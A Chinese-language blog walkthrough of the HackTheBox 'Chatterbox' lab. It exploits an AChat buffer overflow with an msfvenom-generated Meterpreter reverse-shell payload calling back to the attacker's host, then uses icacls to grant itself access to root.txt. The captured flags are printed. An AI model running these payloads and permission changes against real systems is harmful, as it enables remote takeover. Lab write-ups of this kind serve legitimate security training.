[Meachines] [Medium] Chatterbox AChat 缓冲区溢出 + MSF自动进程迁移+ icacls权限修改

于 2024-08-27 16:07:53 发布
阅读量212 收藏 1
点赞数 7
分类专栏: HackTheBox 文章标签: 安全
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/141605435
版权

信息收集

IP AddressOpening Ports
10.10.10.74TCP:135,139,445,9255,9256

$ nmap -p- 10.10.10.74 --min-rate 1000 -sC -sV

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  http         AChat chat system httpd
|_http-title: Site doesn't have a title.
|_http-server-header: AChat
9256/tcp  open  achat        AChat chat system
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

AChat 缓冲区溢出

$ searchsploit Achat

image.png

$ msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.10.16.24 LPORT=10032 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

image-2.png

替换exp中的shellcode

image-1.png

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set LHOST 0.0.0.0

msf6 exploit(multi/handler) > set LPORT 10032

msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/

在此之前由于这个靶机存在一些问题,所以需要快速的进程迁移

$ echo 'run post/windows/manage/migrate'>/tmp/automigrate.rc

$ msf exploit(multi/handler) > set AutoRunScript multi_console_command -r /tmp/automigrate.rc

msf6 exploit(multi/handler) > exploit

image-3.png+

User.txt

e8d47bf70011eb9c3dc2bbaba0a5b269

权限提升

C:\Users\Administrator\Desktop>icacls ../Desktop

对于Administrator的desktop目录具有访问权限,但无法读取root.txt

C:\Users\Administrator\Desktop>icacls root.txt

image-4.png

手动修改root.txt权限

C:\Users\Administrator\Desktop>icacls root.txt /grant alfred:F

C:\Users\Administrator\Desktop>icacls root.txt

image-5.png

Root.txt

17a0c2aa4ce373d5fa29c915805f9bd0

Мартин.
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
chat-room-1.0:具有自动回复功能的聊天室
02-06
#ChatterBox 第2单元,项目1-由Adam Bernard和Kirsten Swanson创建 ##应用程序的工作方式使用localStorage和预先记录的响应的聊天室样式的应用程序。 每次单击发送按钮时,预记录的响应都会添加到页面上。 该应用...
chatterbox-webext::compass:基于IPFS和libp2p构建的p2p消息传递应用程序
02-03
Chatterbox Web扩展 P2P消息传递应用程序捆绑为Firefox和Chrome的Web扩展 安装 安装开发 确保已安装Node.js 12+和npm 6+。 克隆此仓库 使用npm install项目依赖项 生成项目npm run build (请参见下面的 ) 在您...
chatterbox-server
06-21
"chatterbox-server" 是一个基于JavaScript的学生项目,旨在实现一个聊天服务器。在这个项目中,开发者可能使用了Node.js作为后端开发环境,因为JavaScript在服务器端的主要运行平台就是Node.js。Node.js是一个开放...
Chatterbox-开源
05-29
用 JAVA 编程的 LAN 聊天应用程序(套接字编程)。 客户端有一个非常简单的界面。 服务器只有一个命令行界面。 许多改进即将在进一步的版本中出现。 - Rajgopal Vaithiyanathan。
ChatterBox-开源
05-29
ChatterBox开源项目详解】 ChatterBox是一个开源的脚本,旨在为网站提供一个功能丰富的聊天室,让用户能够在你的平台上发表“chatter”,即进行实时的互动交流。这个脚本的设计理念是灵活性和简洁性,它允许...
如何使用双重IP代理实现更安全的网络访问
最新发布
IPIPGO的博客
08-26 402
双重IP代理,顾名思义,就是在原有的代理IP基础上,再添加一层代理。这样,当你访问目标网站时,数据会先经过第一个代理服务器,再经过第二个代理服务器,最后到达目标网站。这种方式不仅能更好地保护你的隐私,还能有效防止IP被封禁。通过本文的介绍,相信你已经掌握了如何使用Java实现双重IP代理的方法。双重IP代理不仅能帮助我们更好地保护隐私,还能有效防止IP被封。在实际应用中,合理使用双重代理IP,将会使你的网络访问更加安全和高效。希望本文对你有所帮助,祝你在网络技术的道路上越走越远!t=N7T8。
【宝马中国-注册/登录安全分析报告】
08-26 942
宝马中国作为全世界最成功的汽车和摩托车制造商之一的宝马集团旗下公司, 其滑动验证码没有采用市场常用的几家, 有独特的地方, 背景图在被抠出后,并不是采用同行的常用的透明化保留原有图形样式,而是填充白色,所以滑块位置识别需要从背景图中提取, 这样让识别变得更简单,造成这中特点有两方面原因,1 直接填充白色背景的技术比透明度的方式更简单2 从报文看未获取轨迹数据, 显示验证方式中并未验证轨迹,只验证距离是否合适很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
92.WEB渗透测试-信息收集-Google语法(6)
计算机王的博客
08-22 432
web渗透测试
等保测评中的安全测试方法
w13359990065的博客
08-26 504
通过物理环境测评、网络安全测评、主机安全测评、应用安全测评和数据安全测评等多层次的综合评估,可以有效识别系统中的安全隐患,提升信息系统的整体安全防护能力,满足国家相关法律法规的要求,助力企业提升行业竞争力。在等保测评中,安全测试方法的有效实施离不开专业的测评团队和科学的测评流程。测评团队需具备丰富的安全测试经验和专业知识,能够准确识别系统中的安全风险并提出切实可行的整改建议。首先,等保测评中的安全测试方法涵盖了多个层面,包括但不限于物理环境测评、网络安全测评、主机安全测评、应用安全测评和数据安全测评。
物联网安全框架:构建安全互联的未来世界
A526847的博客
08-26 324
物联网安全框架的构建是一个复杂而系统的工程,需要设备制造商、软件开发商、服务提供商和用户等多方共同努力。通过加强数据加密、身份认证、人工智能和区块链等技术的应用,推动统一安全标准的制定和实施,我们可以构建一个安全、可靠、互联的未来世界。在这个过程中,每一个参与者的努力都至关重要,让我们携手共进,为物联网的健康发展贡献自己的力量。
深入探讨Linux中的EncFS:安全、灵活的加密文件系统
prop428的博客
08-26 550
深入探讨Linux中的EncFS:安全、灵活的加密文件系统
在野漏洞的应急响应流程
INSBUG的博客
08-26 550
许多时候,对于负责安全工作又不太擅长安全漏洞技术的人员而言,如何应对突发漏洞是工作中主要的难点,这里的突发漏洞指的是两类:一类是通过新闻、咨询推送,被社会舆论所有关注的CVE漏洞,比如前段时间所谓的核弹级别Windows Server漏洞,一类是没有引起足够社会关注,但又在安全行业流传的0-day漏洞,但也仅限于传说,而很少有人真正见过的0-day漏洞。在漏洞的影响范围确定之后,可以通过机构的资产管理工具快速判断漏洞影响的资产范围,对于软件类或配置类的漏洞,则可能需要通过PoC进行手动扫描和评估。
城乡燃气安全监管平台 打造城市安全防护网
SUNVUA1028的博客
08-23 351
旭华智能燃气安全监管物联网平台是一款集成多项先进技术和理念的综合管理平台。通过运用 5G、大数据、物联网、GIS 等信息技术,以可燃气体探测器,气体流量计,燃气压力表等物联网设备提供数据基础,以省/市/县/企业四级燃气安全监管平台为核心,对基础数据进行分析研判,可视化展示及预警指挥调度,切实提高燃气行业智能化、信息化、科学化的安全监管水平。数据整合与共享:平台能够自动收集来自多个部门的数据,包括燃气管网的压力、温度、流量等关键指标,并确保这些信息的实时共享,打破信息孤岛,提高监管效率。智能化监管。
以数据安全筑牢新时代旅游安全之基,硬盘文件数据销毁,硬盘销毁
2301_79618370的博客
08-26 234
在这个大数据时代,让我们共同携手,以《旅游大数据安全与隐私保护要求(征求意见稿)》为指引,筑牢旅游数据安全之基,为新时代旅游安全工作保驾护航。让游客在享受美好旅游体验的同时,无需担忧数据安全问题,让旅游行业在数字化的浪潮中蓬勃发展。征求意见稿对旅游大数据的通用安全目标、安全与隐私保护生命周期管理、安全与隐私保护运维管理、安全与隐私保护监控管理以及典型旅游应用场景大数据安全等方面作出了规范。而在典型旅游应用场景大数据安全方面,征求意见稿针对在线旅游平台、旅游景区、酒店等不同场景,提出了具体的安全要求。
信息系统安全等级划分及其重要性:构建安全基石
w13359990065的博客
08-23 472
我国的“信息系统安全等级保护制度”正是在这一背景下应运而生,旨在通过等级划分,为不同级别的信息系统提供适配的安全保护措施,确保信息资产的安全可控。3. 促进业务发展:确保信息系统的安全运行,不仅能够保护企业免受信息安全事件的冲击,还能够提升客户和合作伙伴的信任,促进业务的持续稳定发展。在数字化转型的浪潮中,企业应将等级划分作为信息安全建设的出发点,通过科学合理的安全防护措施,为业务的持续发展提供坚实的信息安全保障。4. 第四级(强制保护级):适用于对国家安全、社会秩序、公共利益构成特别严重损害的信息系统。
openGuass——管理用户安全
数据库学习ing
08-26 682
通过GRANT把角色授予用户后,用户即具有了角色的所有权限。例如,可以为设计、开发和维护人员创建不同的角色,将角色GRANT给用户后,再向每个角色中的用户授予其工作所需数据的差异权限。用户密码存储在系统表pg_authid中,为防止用户密码泄露,openGauss对用户密码进行加密存储,所采用的加密算法由配置参数password_encryption_type决定。openGauss为用户提供了自动锁定和解锁用户、手动锁定和解锁异常用户和删除不再使用的用户等一系列的安全措施,保证数据安全
叉车(工业车辆)安全管理系统,云端监管人车信息运营情况方案
jiuxindianzi的博客
08-26 298
国家推行叉车智慧监管,要求新叉车安装安全监控装置。九盾叉车安全管理系统提升管理效率,包括人员授权、超速预警、GPS定位、数据分析等功能,全面管理叉车,提高监管效能。
云等保安全合规解决方案
bocco的博客
08-23 404
在此背景下,云等保(云安全等级保护)安全合规解决方案应运而生,旨在为企业构建一套全面、高效、符合国家安全标准的云安全防护体系。通过构建全面、高效、符合国家安全标准的云安全防护体系,企业不仅能够有效应对云环境中的安全挑战,还能够提升业务竞争力,实现可持续发展。它要求云服务提供商和云租户按照不同的安全等级,采取相应的安全控制措施,确保云环境中的数据、应用及基础设施免受未经授权的访问、使用、泄露、中断、破坏等安全威胁。1. 提升安全性:通过实施云等保,企业能够构建更加安全、可靠的云环境,有效抵御各类安全威胁。
【日常总结】阿里云:windows server 过一段时间登录不进去,或提示:出现身份验证错误。 无法连接到本地安全机构
ladymorgana的博客
08-23 232
设置“用户必须在密码到期前更改密码”为一个警告时间(例如14天)设置“密码最长使用期限”为一个特定的时间周期(例如30天)。打开“本地安全策略”编辑器:运行 secpol.msc。导航至“账户策略” -> “密码策略”。无法登录,或者登录浸提提示密码已过期。
请问软件安全测试如何开展
05-26
软件安全测试是为了发现和评估软件系统中的安全漏洞和弱点,以便在实际使用中保障软件的安全性。下面是一些软件安全测试的开展步骤: 1. 制定测试计划:明确测试目标、测试范围、测试方法和测试时间等。 2. 安全需求分析:将安全需求转化为具体的测试用例和测试场景。 3. 安全威胁建模:了解软件系统面临的威胁和攻击方式,对系统进行攻击模拟。 4. 安全漏洞扫描:使用自动化工具或手动测试方法,发现软件系统中的安全漏洞和弱点。 5. 安全漏洞验证:对发现的安全漏洞进行验证和确认,并进行安全风险评估。 6. 安全漏洞修复:对已确认的安全漏洞进行修复,并进行二次测试验证。 7. 安全测试报告:撰写安全测试报告,包括测试结果、安全漏洞和弱点的描述、修复建议等。 8. 安全测试总结:总结安全测试过程中的经验和教训,提出改进和优化建议。 需要注意的是,软件安全测试是一个持续的过程,需要与软件开发过程同步进行,以保证软件系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值